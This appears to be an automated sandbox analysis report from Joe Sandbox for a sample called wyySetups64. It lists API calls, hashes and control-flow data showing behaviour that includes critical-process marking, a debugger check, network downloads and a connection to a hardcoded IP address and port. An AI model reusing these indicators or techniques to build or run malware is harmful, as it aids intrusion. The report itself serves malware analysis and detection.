                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FolderFreeKnownPathTaskwcstombs
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2577077003-0

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 373 1000ff40-1000ff6e NdrClientCall2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Call2Client
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1775071923-0

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 374 1000ff70-1000ffa1 NdrClientCall2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Call2Client
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1775071923-0

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 375 1000ffb0-1000ffe1 NdrClientCall2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Call2Client
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1775071923-0

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 376 1000fff0-10010021 NdrClientCall2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Call2Client
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1775071923-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(ntdll.dll), ref: 1000117B
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,RtlAdjustPrivilege), ref: 1000118D
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,RtlSetProcessIsCritical), ref: 100011A1
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000), ref: 100011FD
                                                                                                                                                                                                              • RegisterClassW.USER32(?), ref: 10001211
                                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,ndowClass,indow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 10001236
                                                                                                                                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 10001251
                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 1000125F
                                                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 10001269
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$AddressProc$ClassCreateDispatchHandleLibraryLoadModuleRegisterTranslateWindow
                                                                                                                                                                                                              • String ID: RtlAdjustPrivilege$RtlSetProcessIsCritical$indow$ndowClass$ntdll.dll
                                                                                                                                                                                                              • API String ID: 3658383123-467612925
                                                                                                                                                                                                              • Opcode ID: 242d59c1bcc2ed5713fb3f605fd77491e9c67476cdc2317376c21f7694c6bbad
                                                                                                                                                                                                              • Instruction ID: 32e2e5621d63ba41cde31a5517ede96aa96e783cbb1150e0d99a961b1b18e838
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 242d59c1bcc2ed5713fb3f605fd77491e9c67476cdc2317376c21f7694c6bbad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A331F4B4D40218AFEB14DFE5CC89BDDBBB4FF48701F108119F60AAA294D7749690CB10
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00D51A74
                                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,1001241C,00000000,50800001,00000014,0000001E,00000159,00000014,00000001,00000065,00000000), ref: 00D51A9A
                                                                                                                                                                                                              • SendMessageW.USER32(100176D4,00000409,00000000,00D77800), ref: 00D51ACE
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,10001B80,?,00000000,00000000), ref: 00D51B20
                                                                                                                                                                                                              • PostQuitMessage.USER32(00000000), ref: 00D51B2B
                                                                                                                                                                                                              • NtdllDefWindowProc_W.NTDLL(00000002,?,?,?), ref: 00D51B44
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_d50000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateMessageWindow$HandleModuleNtdllPostProc_QuitSendThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4292518056-3916222277
                                                                                                                                                                                                              • Opcode ID: 92815e4858959fe170ce8b5a77519db06f86c61dccf7134616d8db3801c69204
                                                                                                                                                                                                              • Instruction ID: dbb316fb4a1dfce28b6668ab646ab268b8e442b421cf2bad86b7ec4cd03e05b9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 92815e4858959fe170ce8b5a77519db06f86c61dccf7134616d8db3801c69204
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB3128B4640218FFEB10DF94CC89FAA7BB5EB48701F20C148FA09AB291D7B0D954CB65
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017,00000001), ref: 10011259
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000003), ref: 1001127F
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000050), ref: 10011309
                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 10011325
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1001133E
                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 10011348
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1045392073-0
                                                                                                                                                                                                              • Opcode ID: 16eea3db4395ea0ceff495b684aed5e6782a3178d032496c99d6345cf79e782e
                                                                                                                                                                                                              • Instruction ID: 9c1a1b5f42fc978b2ff8cf04cdab4bc874b060df06568115b329f45e6489fc23
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 16eea3db4395ea0ceff495b684aed5e6782a3178d032496c99d6345cf79e782e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3431E7B5D01228DADB11DFA4D9897CDBBB8FF08700F1041AAE40CAB250EB719B84CF45
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RpcStringBindingComposeW.RPCRT4(00000000,100124B8,100124E4,100124CC,00000000,00D51D65), ref: 00D5EE95
                                                                                                                                                                                                              • RpcBindingFromStringBindingW.RPCRT4(00D51D65,00000000), ref: 00D5EEB0
                                                                                                                                                                                                              • RpcBindingSetAuthInfoExA.RPCRT4(00000000,00000000,00000006,0000000A,00000000,00000000,00000001), ref: 00D5EEE7
                                                                                                                                                                                                              • RpcStringFreeW.RPCRT4(00D51D65), ref: 00D5EEF1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_d50000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Binding$String$AuthComposeFreeFromInfo
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1126441048-0
                                                                                                                                                                                                              • Opcode ID: c91bc88c3a7059766f5b07bc0c43bf0a72e79487a92db334c44e55e67c91127a
                                                                                                                                                                                                              • Instruction ID: e44938561fc96a1daae998fb56d2d3551bda6c576957c9aa4a3a0e4e067412cd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c91bc88c3a7059766f5b07bc0c43bf0a72e79487a92db334c44e55e67c91127a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2911DAB5D00219BFEB14CFE4C985BEEBBB4FB08704F108559E605B7280D7B59A54CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(00000001), ref: 100113FB
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 1001140A
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 10011413
                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 10011420
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                              • Opcode ID: f86ba159a5725a827743bc82e35b82d2db29b328119a317c3cdfdebdb067eff7
                                                                                                                                                                                                              • Instruction ID: 0a3c688fa97bd66b33bde44f19f6c44622bf0dc03c57f15caf060906c92fb81b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f86ba159a5725a827743bc82e35b82d2db29b328119a317c3cdfdebdb067eff7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45F062B4D1021DEBDB05DBB4CA8999EBBF4FF1D200B918696E412E7111E730EB64DB50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D61526
                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00D6152F
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00D6153A
                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00D61541
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_d50000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3231755760-0
                                                                                                                                                                                                              • Opcode ID: b06f1e73e4fc9b3e9c8109c654ce749b3bdcd294ed5a62abbbf62953f21e2e11
                                                                                                                                                                                                              • Instruction ID: c91bca8abe4cc31a3593bf64d34d242ed6c9426ffac9acabdf0b694d2cdf9089
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b06f1e73e4fc9b3e9c8109c654ce749b3bdcd294ed5a62abbbf62953f21e2e11
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4D0C9B1044114AFEB025BF0AD8CAAD3F25FB0C202F058304F34A81462C6728422CF11
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D61526
                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00D6152F
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00D6153A
                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00D61541
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_d50000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3231755760-0
                                                                                                                                                                                                              • Opcode ID: 0d7c60a2ef05bffbce595573e6e262163d78959232fdd7494e8d52d076cdfd15
                                                                                                                                                                                                              • Instruction ID: 4980016af1f69655e72f99868af42ae204db573405a571edd3281e81c481927a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d7c60a2ef05bffbce595573e6e262163d78959232fdd7494e8d52d076cdfd15
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F6D012B1000114ABE7022FF0DD4CB593F29FB0C202F058200F30981022CB32D422CF51
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00D60EFD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_d50000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FeaturePresentProcessor
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2325560087-0
                                                                                                                                                                                                              • Opcode ID: e10a114a485f4d5e76f2123a624d2e1dd2d0fbf69899314706d994fee8950484
                                                                                                                                                                                                              • Instruction ID: 9b2d5830297149f68661b34005b9ab08a4c921503e6427eb5770f98a54a419f4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e10a114a485f4d5e76f2123a624d2e1dd2d0fbf69899314706d994fee8950484
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17A14C75A11715CBEB1ACF55C8C179ABBB1FB48365F18C52AE429E72A0D334D940CF60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 10010F26
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FeaturePresentProcessor
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2325560087-0
                                                                                                                                                                                                              • Opcode ID: e10a114a485f4d5e76f2123a624d2e1dd2d0fbf69899314706d994fee8950484
                                                                                                                                                                                                              • Instruction ID: 2823fa2859f74bead7cb2a3ff5e24ff6c926bc6ae68a0f7e2a3c8df160a01c34
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e10a114a485f4d5e76f2123a624d2e1dd2d0fbf69899314706d994fee8950484
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EBA1F7B1E11715CBEB1ACF54C8C169ABBF1FB48364F15C52AE819EB290D374DA808B90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NtdllDefWindowProc_W.NTDLL(00000011,?,?,?), ref: 00D51135
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_d50000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: NtdllProc_Window
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4255912815-0
                                                                                                                                                                                                              • Opcode ID: 107021637aa96cc5c1bd2a280f74957b00f7bc018f5350d6d5e6892ae08a1c1a
                                                                                                                                                                                                              • Instruction ID: 5c49a896657d9d5056e40f461b09cf7d74cddba61ae46fb975a2a7b8595ddc58
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 107021637aa96cc5c1bd2a280f74957b00f7bc018f5350d6d5e6892ae08a1c1a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C21EA78A44709AFEF14CF94CC86FAD7775AB48702F108059FA166A2D0C6B09944CB61
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_d50000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
                                                                                                                                                                                                              • Instruction ID: e3e4ffe5d5777b626c31e0dcde191156e3d8de247271d6b7342cd66842c622be
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2317A76A087468FCB14DF18C4C0826BBE4FF89319F1A096DEC9597312E770F9598BA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WSAStartup.WS2_32(00000202,?), ref: 100100E3
                                                                                                                                                                                                              • getaddrinfo.WS2_32(118.107.44.219,18852,?,00000000), ref: 1001012A
                                                                                                                                                                                                              • WSACleanup.WS2_32 ref: 10010139
                                                                                                                                                                                                              • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10010141
                                                                                                                                                                                                              • socket.WS2_32(?,?,?), ref: 10010182
                                                                                                                                                                                                              • WSACleanup.WS2_32 ref: 10010196
                                                                                                                                                                                                              • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 1001019E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Cleanupexit$Startupgetaddrinfosocket
                                                                                                                                                                                                              • String ID: 118.107.44.219$18852
                                                                                                                                                                                                              • API String ID: 2357443324-3001398927
                                                                                                                                                                                                              • Opcode ID: 629c58ebb369c9a4567a25f7efc7421930806d5ddf401b53f73b529e587ce57b
                                                                                                                                                                                                              • Instruction ID: 5d8dd8f7e503384157f0d0037aa173dfcecf3f6c77ed8d91bfff33004e817cc6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 629c58ebb369c9a4567a25f7efc7421930806d5ddf401b53f73b529e587ce57b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC61F8B0A05225EFE704DFA8CD88B9D7BB5FB48311F108199F519AB2A0C774D980DB65
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 1000CE28
                                                                                                                                                                                                              • ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 1000CE4D
                                                                                                                                                                                                              • ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 1000CE76
                                                                                                                                                                                                              • ?flags@ios_base@std@@QBEHXZ.MSVCP140(0Gl), ref: 1000CEE5
                                                                                                                                                                                                              • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 1000CF26
                                                                                                                                                                                                              • ?fill@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDXZ.MSVCP140 ref: 1000CF3A
                                                                                                                                                                                                              • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?), ref: 1000CF4B
                                                                                                                                                                                                              • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 1000CF9C
                                                                                                                                                                                                              • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP140(1000F2B3,?,?), ref: 1000CFB4
                                                                                                                                                                                                              • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 1000D010
                                                                                                                                                                                                              • ?fill@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDXZ.MSVCP140 ref: 1000D024
                                                                                                                                                                                                              • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?), ref: 1000D035
                                                                                                                                                                                                              • ?width@ios_base@std@@QAE_J_J@Z.MSVCP140(00000000,00000000), ref: 1000D088
                                                                                                                                                                                                              • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000), ref: 1000D0DA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: U?$char_traits@$D@std@@@std@@$?width@ios_base@std@@$?rdbuf@?$basic_ios@D@std@@@2@V?$basic_streambuf@$?fill@?$basic_ios@?sputc@?$basic_streambuf@$?flags@ios_base@std@@?setstate@?$basic_ios@?sputn@?$basic_streambuf@
                                                                                                                                                                                                              • String ID: 0Gl$0Gl
                                                                                                                                                                                                              • API String ID: 4125389999-964914055
                                                                                                                                                                                                              • Opcode ID: d7ddfb35de5600b2af610cc6f86c0c04c4b658ff1ac8b4a744557df133d45fe0
                                                                                                                                                                                                              • Instruction ID: 9f71a8f020fe28d290ef7ad39ca2b4630c2ccf5d8ae75f0951f39d4c8cecbd13
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d7ddfb35de5600b2af610cc6f86c0c04c4b658ff1ac8b4a744557df133d45fe0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35B1C974D00259DFEB04CF94C895BADBBB1FF48344F208169E90AAB359CB34A985CF90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WSAStartup.WS2_32(00000202,?), ref: 00D600BA
                                                                                                                                                                                                              • getaddrinfo.WS2_32(100170B4,10013B50,?,00000000), ref: 00D60101
                                                                                                                                                                                                              • WSACleanup.WS2_32 ref: 00D60110
                                                                                                                                                                                                              • socket.WS2_32(?,?,?), ref: 00D60159
                                                                                                                                                                                                              • WSACleanup.WS2_32 ref: 00D6016D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_d50000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Cleanup$Startupgetaddrinfosocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2560534018-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • InternetOpenA.WININET(10012448,00000001,00000000,00000000,00000000), ref: 00D51BA1
                                                                                                                                                                                                              • InternetOpenUrlA.WININET(?,?,00000000,00000000,80000000,00000000), ref: 00D51BBD
                                                                                                                                                                                                              • HttpQueryInfoW.WININET(?,20000005,00000000,00000004,00000000), ref: 00D51C04
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00D51C21
                                                                                                                                                                                                              • InternetReadFile.WININET(?,?,00001000,?), ref: 00D51C3C
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00D51CF2
                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00D51D0F
                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00D51D19
                                                                                                                                                                                                              • GetParent.USER32(?), ref: 00D51D23
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00D51D32
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_d50000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Internet$CloseHandleMessageOpenSend$FileHttpInfoParentQueryReadShowWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2293700532-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000), ref: 00D51829
                                                                                                                                                                                                                • Part of subcall function 00D515D7: SHGetKnownFolderPath.SHELL32(10012340,00000000,00000000,00000000), ref: 00D51632
                                                                                                                                                                                                                • Part of subcall function 00D515D7: CoTaskMemFree.COMBASE(00000000), ref: 00D51685
                                                                                                                                                                                                              • RegisterClassW.USER32(?), ref: 00D51984
